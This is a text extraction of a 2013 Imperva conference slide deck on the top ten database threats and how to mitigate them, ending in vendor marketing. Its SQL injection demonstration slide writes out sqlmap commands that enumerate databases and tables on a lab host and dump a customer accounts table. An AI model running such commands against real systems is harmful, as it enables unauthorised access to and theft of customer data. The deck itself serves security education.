© 2013 Imperva, Inc. All rights reserved.

Top 10 Database Threats

ISACA Charlotte Chapter

Confidential 1

Presented by Eric Gerena

© 2013 Imperva, Inc. All rights reserved.

Agenda

Background

Top 10 Database Threats

Neutralizing the Threats

SQLi Attack Demonstration

Q&A

© Copyright 2012 Imperva, Inc. All rights reserved. 2

© 2013 Imperva, Inc. All rights reserved.

Background

© 2013 Imperva, Inc. All rights reserved.

What’s Changed?

© 2013 Imperva, Inc. All rights reserved.

Top 10 Database Threats

Confidential 5

Are you at risk?

© 2013 Imperva, Inc. All rights reserved.

1. Excessive & Unused Privileges

© 2013 Imperva, Inc. All rights reserved.

2. Privilege Abuse

© 2013 Imperva, Inc. All rights reserved.

3. SQLi (SQL Injection)

© 2013 Imperva, Inc. All rights reserved.

4. Malware

© 2013 Imperva, Inc. All rights reserved.

5. Weak Audit Trail

© 2013 Imperva, Inc. All rights reserved.

6. Storage Media Exposure

© 2013 Imperva, Inc. All rights reserved.

7. Database Vulnerability Exploitation

© 2013 Imperva, Inc. All rights reserved.

8. Unmanaged Sensitive Data

© 2013 Imperva, Inc. All rights reserved.

9. Denial of Service (DoS)

© 2013 Imperva, Inc. All rights reserved.

10. Limited Security Expertise & Education

© 2013 Imperva, Inc. All rights reserved.

Neutralizing the Threats

Confidential 16

Risk Mitigation

© 2013 Imperva, Inc. All rights reserved.

How to Neutralize the Threats

CONFIDENTIAL

Discover, Classify & Assess

User Rights Management

Auditing, Monitoring & Protecting

Data Protection

Non-Technical Security

© 2013 Imperva, Inc. All rights reserved.

Discover, Classify & Assess

Rogue

SSN

Credit Cards

PII

Discover Active DBs

Discover Rogue DBs

Classify DBs

Vulnerability Assessments

Risk

© 2013 Imperva, Inc. All rights reserved.

User Rights Management

Reduce Unwarranted Data Access

Map Rights to Individuals

Identify Dormant Accounts

Enforce “Need-to-Know”

Comply

© 2013 Imperva, Inc. All rights reserved.

Auditing, Monitoring & Protecting

UPDATE orders set client ‘first Unusual Activity

X Allow

Block

Network User, DBAs, Sys Admin

X

Real Time Alerting & Blocking

Detect Unusual DB Activity

Monitor Local DB Activity

Impose Connection Controls

© 2013 Imperva, Inc. All rights reserved.

Data Protection

Tamper-Proof Audit Trail

Storage Encryption

© 2013 Imperva, Inc. All rights reserved.

Non-Technical Security

User Education & Awareness

Cultivate Experienced Security Professionals

© 2013 Imperva, Inc. All rights reserved.

Risk Reduction

CONFIDENTIAL 23

0

5

10

15

20

25

30

35

Q1-2103 Q2-2013 Q3-2013 Q4-2013

AwarenessAuditVulnerabilities

© 2013 Imperva, Inc. All rights reserved.

SQLi Attack Demonstration

Confidential 24

It still works!

© 2013 Imperva, Inc. All rights reserved.

Anatomy of the Attack

Identify the Vulnerability

Exploit the Vulnerability

Compromi$e the Victim

© 2013 Imperva, Inc. All rights reserved.

So, what tools will be used?

Identify the Vulnerability

Exploit the Vulnerability

Compromi$e the Victim

Commercial Web App Vulnerability Scanner

DB Exploit Tool "SQLMap"

© 2013 Imperva, Inc. All rights reserved.

SQLMap Attack Commands

Identify All Databases and Current Database ./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything --dbs

./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything --current-db

Identify Table(s) of Interest and Associated Columns ./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything -D superveda_db

--tables ./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything -D superveda_db

-T Legacy_Customer_Accounts --columns

Dump Records from Identified Table and Columns ./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything -D superveda_db

-T Legacy_Customer_Accounts --columns --dump >> /root/Desktop/SQLi-Attack-Results.txt

© 2013 Imperva, Inc. All rights reserved.

Off to the Black Market!

© 2013 Imperva, Inc. All rights reserved.

Imperva

Confidential 29

Data Security Solutions

© 2013 Imperva, Inc. All rights reserved.

Imperva Highlights

About Imperva • Founded: 2002 • CEO: Shlomo Kramer, Co-Founder of Check Point • HQ in Redwood Shores, CA • 1,800+ customers; 25,000+ organizations • Customers in 50+ countries

The Problems We Solve The Problems We Solve Protecting the Data that Drives Business Maintaining Regulatory Compliance

30

Company Highlights • 480+ Employees • $104M in Revenue • $48M Deferred Revenue • Cash & CE: $ 102M • Publicly Traded: IMPV

2010 2011 2012 2013

33% YoY Growth

© 2013 Imperva, Inc. All rights reserved.

The Solution

Confidential 31

Solving the business security problem requires a new protection layer positioned closely around the data and applications in the data center

External Customers

Staff, Partners Hackers

Internal Employees

Malicious Insiders Compromised Insiders

Data Center Systems and Admins

Tech. Attack Protection

Logic Attack Protection

Fraud Prevention

Usage Audit

User Rights Management

Access Control

IMPERVA’S MISSION IS TO PROVIDE A COMPLETE SOLUTION

© 2013 Imperva, Inc. All rights reserved.

Databases - Coverage

Coverage for Heterogeneous Databases

DB2 DB2 z/OS DB2400 Informix Netezza

© 2013 Imperva, Inc. All rights reserved.

Web Scanner Integration

33

© 2013 Imperva, Inc. All rights reserved.

Thank You

Confidential 34

Imperva Data Security Solutions